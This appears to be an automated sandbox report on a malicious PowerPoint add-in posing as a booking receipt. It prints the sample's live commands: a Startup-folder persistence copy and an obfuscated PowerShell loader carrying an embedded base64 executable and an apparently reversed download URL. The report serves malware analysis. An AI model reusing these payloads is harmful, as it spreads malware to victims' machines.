623027463a2ef70f60ff6a0991019847a3fb24da3b633b52da4a99a77c99f92b

General

Target

ComprovanteXdeXreserva.ppam
Size

20KB
MD5

fd0d3e25d88b5c318f4dc543a7770f22
SHA1

94572d313222700a565f2ff161223bb28464636c
SHA256

623027463a2ef70f60ff6a0991019847a3fb24da3b633b52da4a99a77c99f92b
SHA512

48936b4677c10a8466cbaa631a9cbc8ce2b0d995b427fd56c894d98d42abc834bbaeb397401ff131b94f93f05978c8496cf9beaad2f059d8bd04511b40e2e9d8

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

WScript.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE is not expected to spawn this process	1992	1640	WScript.exe	POWERPNT.EXE

Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

9 1992 WScript.exe

flow	pid	process
9	1992	WScript.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

POWERPNT.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Toolbar	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	POWERPNT.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	POWERPNT.EXE

Modifies registry class 64 IoCs

Processes:

POWERPNT.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348A-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349C-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A57-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E553-4FF5-48F4-8215-5505F990966F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348E-5A91-11CF-8700-00AA0060263B}\ = "PlaySettings"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349A-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A67-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "ErrorBars"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493468-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934CE-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E559-4FF5-48F4-8215-5505F990966F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DD-5A91-11CF-8700-00AA0060263B}\ = "Sequences"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F9-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5C-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A7B-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E553-4FF5-48F4-8215-5505F990966F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493489-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493496-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D4-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E9-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F6-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493450-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493455-5A91-11CF-8700-00AA0060263B}\ = "DocumentWindows"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493458-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	POWERPNT.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493474-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493496-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A69-F07E-4CA4-AF6F-BEF486AA4E6F}\ProxyStubClsid32	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934F1-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A58-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5F-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A66-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "DropLines"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E557-4FF5-48F4-8215-5505F990966F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493452-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345B-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E2-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934E8-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A62-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A6F-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "LegendEntries"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A78-F07E-4CA4-AF6F-BEF486AA4E6F}\ = "TickLabels"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BA72E558-4FF5-48F4-8215-5505F990966F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493483-5A91-11CF-8700-00AA0060263B}\ = "ThreeDFormat"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493494-5A91-11CF-8700-00AA0060263B}\TypeLib\Version = "2.a"	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934DE-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149349A-5A91-11CF-8700-00AA0060263B}\ProxyStubClsid32	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934D6-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A5D-F07E-4CA4-AF6F-BEF486AA4E6F}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149345B-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9149348F-5A91-11CF-8700-00AA0060263B}\TypeLib\ = "{91493440-5A91-11CF-8700-00AA0060263B}"	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493492-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934EE-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{92D41A55-F07E-4CA4-AF6F-BEF486AA4E6F}\TypeLib\Version = "2.a"	POWERPNT.EXE
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91493467-5A91-11CF-8700-00AA0060263B}\TypeLib	POWERPNT.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{914934C8-5A91-11CF-8700-00AA0060263B}	POWERPNT.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

952 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

1640 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1688 powershell.exe
1304 powershell.exe
1552 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1688 powershell.exe
Token: SeDebugPrivilege 1304 powershell.exe
Token: SeDebugPrivilege 1552 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

POWERPNT.EXE

pid process

1640 POWERPNT.EXE

pid	process
952	PING.EXE

pid	process
1640	POWERPNT.EXE

pid	process
1688	powershell.exe
1304	powershell.exe
1552	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	1552	powershell.exe

pid	process
1640	POWERPNT.EXE

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

POWERPNT.EXEWScript.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 1640 wrote to memory of 1812	1640	POWERPNT.EXE	splwow64.exe
PID 1640 wrote to memory of 1812	1640	POWERPNT.EXE	splwow64.exe
PID 1640 wrote to memory of 1812	1640	POWERPNT.EXE	splwow64.exe
PID 1640 wrote to memory of 1812	1640	POWERPNT.EXE	splwow64.exe
PID 1640 wrote to memory of 1992	1640	POWERPNT.EXE	WScript.exe
PID 1640 wrote to memory of 1992	1640	POWERPNT.EXE	WScript.exe
PID 1640 wrote to memory of 1992	1640	POWERPNT.EXE	WScript.exe
PID 1640 wrote to memory of 1992	1640	POWERPNT.EXE	WScript.exe
PID 1992 wrote to memory of 1524	1992	WScript.exe	cmd.exe
PID 1992 wrote to memory of 1524	1992	WScript.exe	cmd.exe
PID 1992 wrote to memory of 1524	1992	WScript.exe	cmd.exe
PID 1992 wrote to memory of 1524	1992	WScript.exe	cmd.exe
PID 1524 wrote to memory of 952	1524	cmd.exe	PING.EXE
PID 1524 wrote to memory of 952	1524	cmd.exe	PING.EXE
PID 1524 wrote to memory of 952	1524	cmd.exe	PING.EXE
PID 1524 wrote to memory of 952	1524	cmd.exe	PING.EXE
PID 1524 wrote to memory of 1612	1524	cmd.exe	cmd.exe
PID 1524 wrote to memory of 1612	1524	cmd.exe	cmd.exe
PID 1524 wrote to memory of 1612	1524	cmd.exe	cmd.exe
PID 1524 wrote to memory of 1612	1524	cmd.exe	cmd.exe
PID 1612 wrote to memory of 1688	1612	cmd.exe	powershell.exe
PID 1612 wrote to memory of 1688	1612	cmd.exe	powershell.exe
PID 1612 wrote to memory of 1688	1612	cmd.exe	powershell.exe
PID 1612 wrote to memory of 1688	1612	cmd.exe	powershell.exe
PID 1992 wrote to memory of 1304	1992	WScript.exe	powershell.exe
PID 1992 wrote to memory of 1304	1992	WScript.exe	powershell.exe
PID 1992 wrote to memory of 1304	1992	WScript.exe	powershell.exe
PID 1992 wrote to memory of 1304	1992	WScript.exe	powershell.exe
PID 1304 wrote to memory of 1552	1304	powershell.exe	powershell.exe
PID 1304 wrote to memory of 1552	1304	powershell.exe	powershell.exe
PID 1304 wrote to memory of 1552	1304	powershell.exe	powershell.exe
PID 1304 wrote to memory of 1552	1304	powershell.exe	powershell.exe

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\ComprovanteXdeXreserva.ppam"
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1812

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\x.vbs"
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs')"
3⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 5
4⤵
- Runs ping.exe
PID:952

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs')"
4⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXG.vbs')
5⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J✍✍Bw✍✍Ek✍✍QwB3✍✍HY✍✍I✍✍✍✍9✍✍C✍✍✍✍Jw✍✍l✍✍EE✍✍U✍✍B5✍✍Go✍✍Z✍✍Bh✍✍FU✍✍WQBh✍✍Gs✍✍JQ✍✍n✍✍Ds✍✍WwBC✍✍Hk✍✍d✍✍Bl✍✍Fs✍✍XQBd✍✍C✍✍✍✍J✍✍BI✍✍Fc✍✍cQBN✍✍FE✍✍I✍✍✍✍9✍✍C✍✍✍✍WwBT✍✍Hk✍✍cwB0✍✍GU✍✍bQ✍✍u✍✍EM✍✍bwBu✍✍HY✍✍ZQBy✍✍HQ✍✍XQ✍✍6✍✍Do✍✍RgBy✍✍G8✍✍bQBC✍✍GE✍✍cwBl✍✍DY✍✍N✍✍BT✍✍HQ✍✍cgBp✍✍G4✍✍Zw✍✍o✍✍C✍✍✍✍J✍✍Bw✍✍Ek✍✍QwB3✍✍HY✍✍I✍✍✍✍p✍✍Ds✍✍WwBT✍✍Hk✍✍cwB0✍✍GU✍✍bQ✍✍u✍✍EE✍✍c✍✍Bw✍✍EQ✍✍bwBt✍✍GE✍✍aQBu✍✍F0✍✍Og✍✍6✍✍EM✍✍dQBy✍✍HI✍✍ZQBu✍✍HQ✍✍R✍✍Bv✍✍G0✍✍YQBp✍✍G4✍✍LgBM✍✍G8✍✍YQBk✍✍Cg✍✍J✍✍BI✍✍Fc✍✍cQBN✍✍FE✍✍KQ✍✍u✍✍Ec✍✍ZQB0✍✍FQ✍✍eQBw✍✍GU✍✍K✍✍✍✍n✍✍EM✍✍b✍✍Bh✍✍HM✍✍cwBM✍✍Gk✍✍YgBy✍✍GE✍✍cgB5✍✍DM✍✍LgBD✍✍Gw✍✍YQBz✍✍HM✍✍MQ✍✍n✍✍Ck✍✍LgBH✍✍GU✍✍d✍✍BN✍✍GU✍✍d✍✍Bo✍✍G8✍✍Z✍✍✍✍o✍✍Cc✍✍UgB1✍✍G4✍✍Jw✍✍p✍✍C4✍✍SQBu✍✍HY✍✍bwBr✍✍GU✍✍K✍✍✍✍k✍✍G4✍✍dQBs✍✍Gw✍✍L✍✍✍✍g✍✍Fs✍✍bwBi✍✍Go✍✍ZQBj✍✍HQ✍✍WwBd✍✍F0✍✍I✍✍✍✍o✍✍Cc✍✍VwBH✍✍Dg✍✍Yg✍✍v✍✍Hc✍✍YQBy✍✍C8✍✍ZQBk✍✍G8✍✍Yw✍✍v✍✍G8✍✍aQ✍✍u✍✍HM✍✍b✍✍Bv✍✍G8✍✍d✍✍B3✍✍C8✍✍Lw✍✍6✍✍HM✍✍c✍✍B0✍✍HQ✍✍a✍✍✍✍n✍✍Ck✍✍KQ✍✍=';$VXdfe = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('✍✍','A') ) ).replace('%APyjdaUYak%','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